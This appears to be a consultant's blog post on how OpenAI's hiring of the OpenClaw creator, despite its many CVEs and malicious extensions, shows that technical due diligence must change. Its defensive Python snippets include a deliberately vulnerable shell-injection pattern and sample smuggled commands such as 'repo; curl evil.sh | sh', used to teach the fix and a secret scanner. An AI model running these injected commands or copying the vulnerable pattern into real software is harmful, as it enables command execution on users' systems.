OpenAI just hired the creator of the open source project most criticized by the cybersecurity community in 2026. Ten critical CVEs, 824 malicious extensions, 135,000 instances exposed on the Internet. And yet, Sam Altman signed. What does this tell us about the state of technical due diligence today?
Six months ago, during my last technical due diligence for an M&A deal, things were fairly straightforward. We looked at code quality, test coverage, architecture, technical debt, and key-person dependencies. We asked the CTO the right questions, audited the repo, checked the boxes. It was a rigorous but predictable exercise.
And then vibe coding came along.
Vibe coding is this way of building applications by conversing with AI. You describe what you want, Cursor or Claude Code generates the code, you iterate. A single developer can ship in one weekend what used to take a team of five three months. It's the printing press applied to code: anyone can now create.
The problem is that anyone can also create anything. And that anything can be worth hundreds of millions.
The textbook case: OpenClaw
In mid-February 2026, OpenAI announced the hiring of Peter Steinberger, an Austrian developer and creator of OpenClaw, an open source personal AI assistant. The project, launched in November 2025 under the name ClawdBot (renamed MoltBot after a trademark warning from Anthropic over the Claude brand, then OpenClaw), had broken every record: 200,000 GitHub stars, 41,800 forks, the fastest growth in the platform's history.
Sam Altman hailed a "genius" on X. The project would join an open source foundation backed by OpenAI. Steinberger would lead "the next generation of personal agents." Meta and Microsoft had also made offers. Satya Nadella had called personally.
Except for one thing.
At the time of this deal, OpenClaw's security track record looked like an incident report, not a production-ready product.
The staggering numbers
Let's start with the CVEs — the publicly catalogued vulnerabilities. OpenClaw had accumulated ten at the time of the acquisition, along with fourteen GitHub Security Advisories, including five patched in the same week in late January 2026. Among them, CVE-2026-25253: a flaw enabling remote code execution with a single click, rated 8.8 out of 10 in severity. Simply visiting a booby-trapped web page was enough for an attacker to take full control of the agent, even on a locally configured instance. The victim's browser did the attacker's work for them.
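This confused-deputy pattern is generic to local-first agents: a control endpoint on localhost implicitly trusts everything that reaches it, and the victim's browser will happily deliver a malicious page's request there. A minimal sketch of the missing defense, with hypothetical names throughout (this is not OpenClaw's actual API):

```python
import secrets

# Illustrative values only: the port, header name, and UI origin are
# assumptions for this sketch, not OpenClaw's real configuration.
ALLOWED_ORIGINS = {"http://127.0.0.1:8700"}  # the agent's own local UI

def is_request_authorized(headers: dict, session_token: str) -> bool:
    """Refuse cross-origin browser requests and demand a per-session
    secret that a booby-trapped third-party page cannot know."""
    origin = headers.get("Origin", "")
    supplied = headers.get("X-Agent-Token", "")
    return origin in ALLOWED_ORIGINS and secrets.compare_digest(
        supplied, session_token
    )

token = secrets.token_urlsafe(32)  # generated once per agent session

# Forged by a malicious page the victim merely visits: wrong origin,
# no token, rejected.
assert not is_request_authorized({"Origin": "https://evil.example"}, token)
# Sent by the agent's own UI with the session secret: accepted.
assert is_request_authorized(
    {"Origin": "http://127.0.0.1:8700", "X-Agent-Token": token}, token
)
```

Checking the Origin header alone is not enough, since non-browser clients can omit or forge it; the session token is what does the real work.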
In quick succession, two more critical flaws: an SSH command injection via a malicious project path on macOS (CVE-2026-25157), and a Docker sandbox bypass through PATH manipulation (CVE-2026-24763). All with public exploits — meaning anyone could use them.
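The injection flaw belongs to an old and well-understood class: attacker-controlled strings interpolated into a shell command. A sketch of the vulnerable pattern and its fix, in illustrative Python rather than OpenClaw's actual code:

```python
import subprocess

def run_git_status_unsafe(project_path: str) -> None:
    # Vulnerable pattern: an attacker-controlled path spliced into a
    # shell string. A path like "repo; curl evil.sh | sh" smuggles in
    # a second command.
    subprocess.run(f"cd {project_path} && git status", shell=True)

def run_git_status_safe(project_path: str) -> None:
    # Fix: no shell, an argument vector, an explicit cwd. The path is
    # now data, never code.
    subprocess.run(["git", "status"], cwd=project_path, check=True)

def looks_injection_risky(path: str) -> bool:
    """Cheap triage heuristic for an audit: shell metacharacters in a
    string that may later reach a shell."""
    return any(ch in path for ch in ';&|`$<>(){}\n')

assert looks_injection_risky("repo; rm -rf ~")
assert not looks_injection_risky("/home/dev/my-repo")
```

The heuristic is a triage aid for reviewers, not a fix; the fix is the argument-vector call that never hands the path to a shell.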
On the marketplace side, the picture was even bleaker. ClawHub, the community extension repository, had 824 malicious skills identified by researchers. A Snyk study showed that 36 percent of all skills in the catalog contained security vulnerabilities. The most massive campaign, dubbed ClawHavoc, had distributed an infostealer targeting crypto wallets, SSH keys, and browser passwords on macOS.
Network exposure figures completed the picture. SecurityScorecard and Bitsight identified over 135,000 OpenClaw instances exposed on the Internet across 82 countries, with nearly 13,000 directly exploitable via remote code execution. The project's official Docker image alone carried 2,062 known vulnerabilities.
And the cherry on top: API tokens, authentication keys, and session data were stored in plaintext in Markdown and JSON files. The Supabase database for Moltbook, the satellite social network, had exposed 1.5 million API tokens and 35,000 email addresses.
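Plaintext credentials sitting in Markdown and JSON files are exactly what a first-pass audit script catches. A minimal sketch, with illustrative patterns only (production scanners such as gitleaks or trufflehog ship hundreds of rules plus entropy checks):

```python
import re
from pathlib import Path

# Illustrative patterns, not an exhaustive rule set.
SECRET_PATTERNS = [
    re.compile(r"sk-[A-Za-z0-9]{20,}"),   # OpenAI-style API key
    re.compile(r"AKIA[0-9A-Z]{16}"),      # AWS access key ID
    re.compile(r"(?i)(api[_-]?key|token|secret)\s*[:=]\s*['\"][^'\"]{12,}"),
]

def scan_text(text: str) -> list[str]:
    """Return the secret-looking substrings found in one file's text."""
    hits: list[str] = []
    for pattern in SECRET_PATTERNS:
        hits.extend(match.group(0) for match in pattern.finditer(text))
    return hits

def scan_tree(root: str) -> dict[str, list[str]]:
    """Scan Markdown and JSON files under root, the two formats that
    held plaintext tokens here, and map each path to its findings."""
    findings: dict[str, list[str]] = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in {".md", ".json"}:
            hits = scan_text(path.read_text(errors="ignore"))
            if hits:
                findings[str(path)] = hits
    return findings
```

Ten minutes of scripting like this, run against a target's repo during diligence, would have surfaced the problem before any term sheet.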
Cisco Talos called the project a "security nightmare." The Register called it a "dumpster fire." Meta banned it from its corporate devices. Palo Alto Networks, CrowdStrike, Bitdefender, and Kaspersky all published dedicated security advisories.
When a journalist asked Steinberger about these issues, he responded that security "wasn't really something he wanted to prioritize." The project had no bug bounty program and no security budget.
So why did OpenAI sign?
This is the question that should haunt every tech M&A professional. And the answer is uncomfortable: because the traditional evaluation framework no longer captures what holds value in 2026.
What OpenAI bought wasn't code. OpenClaw's code base is, charitably, a work in progress. What they bought is a creator who proved that a single developer, with the right AI tools, could build the fastest-growing open source project in history and rally a global community in a matter of weeks.
Steinberger embodies exactly the profile that vibe coding makes possible: a creative with a product vision, lightning-fast execution capability, and an intuitive understanding of what people want. That he doesn't master the security of what he builds — OpenAI will handle that. They have the teams, the resources, the infrastructure.
It's rational from the acquirer's perspective. But it's a warning signal for our profession.
What this changes for due diligence
When an acquirer can look at a project riddled with vulnerabilities, value it at an undisclosed sum estimated in the millions, and still consider it a good deal, it means our evaluation criteria are one step behind.
Code is no longer the primary asset. Talent, traction, and community now outweigh technical cleanliness. This is a paradigm shift you can accept or reject, but you cannot ignore it.
That said, it doesn't exempt anyone from doing the work. It requires doing it differently.
When I evaluate a project in 2026, the questions I ask the CTO are no longer the ones I asked two years ago. Today, I want to see the development workflow live. Not a theoretical architecture, not a PowerPoint. I want to know which IDEs and CLIs the team uses daily. Do they cross-check output across multiple LLMs, or paste in the first thing Cursor produces without review? Does the CI/CD pipeline exist and actually run, or do they deploy by pushing to main? Are the unit tests there because they make sense, or because the AI mass-generated them to inflate coverage?
The real question, the one that cuts through, is this: does the team understand what it has built?
In OpenClaw's case, the answer was clearly no — at least on the security side. The creator said so himself. And OpenAI signed anyway, because the value lay elsewhere.
The framework I recommend
For acquirers who want to adapt their due diligence to this new reality, here are the five areas I recommend today.
The first is stack mastery. Ask for a live demo — unscripted. Have the people who made the architectural decisions explain them. If the team can't defend its technical choices without consulting the code, that's a red flag.
The second is a third-party security audit. AI-generated code has recurring vulnerability patterns. A specialized auditor spots them. This has become non-negotiable, especially for projects that grew fast.
The third is assessing invisible technical debt. Fragile dependencies, trendy frameworks that will be abandoned in eighteen months, overly verbose code that multiplies the attack surface. Vibe coding produces code that works but is often oversized and poorly optimized.
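Part of that invisible-debt check can be automated. A sketch that flags unpinned entries in a requirements.txt, one cheap proxy for dependency fragility (the heuristic and threshold are my own, not a standard):

```python
def unpinned_requirements(requirements_text: str) -> list[str]:
    """Return requirement lines not pinned to an exact version.
    Unpinned dependencies are a simple proxy for the invisible debt
    of fast-grown projects: builds that drift and break when an
    upstream package moves."""
    flagged = []
    for raw in requirements_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blanks
        if not line:
            continue
        if "==" not in line:  # ranges (>=) and bare names both count
            flagged.append(line)
    return flagged

reqs = """\
requests==2.31.0
fastapi            # unpinned: resolves to whatever is newest
numpy>=1.20        # a range, not a pin
"""
print(unpinned_requirements(reqs))  # ['fastapi', 'numpy>=1.20']
```

The same idea extends to lockfile age, abandoned upstreams, and transitive depth; the point is that invisible debt becomes visible the moment you script the question.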
The fourth is analyzing the intent behind AI usage. Is the team using AI to go further, to amplify its creative capacity? Or is it using AI to replace expertise it never had? The first approach creates lasting value. The second creates technical debt disguised as productivity.
The fifth is the ability to maintain and evolve. A "vibe coded" project that can only be maintained by its original creator, with the same prompts and the same tools, is a single point of failure disguised as innovation.
The era of creatives — with a safety net
Vibe coding is a tremendous advance. It's the printing press of code, and like the printing press, it will transform our relationship with software creation. People who could never have built a product two years ago can now do it in a weekend. This is the era of creatives, and that's good news.
But the OpenClaw story reminds us that building fast and building well are two different things. And that our role as evaluators is precisely to tell the difference between the two.
OpenAI has the resources to turn a vulnerability-riddled project into a secure product. Most acquirers don't have that luxury. When you evaluate a tech target in 2026, don't let yourself be dazzled by GitHub stars and viral growth. Look under the hood. Ask the uncomfortable questions. And remember that a product that delights users but frightens security researchers is a liability as much as an asset.
Technical due diligence isn't dead. It just needs to learn how to evaluate a world where code has become disposable, but where talent, vision, and community are not.
To see how these principles apply in practice to B2G, read my case study on the B2B to B2G transition with aquagir and Numérique360. Need an outside perspective on an M&A deal or tech due diligence? Let's talk.
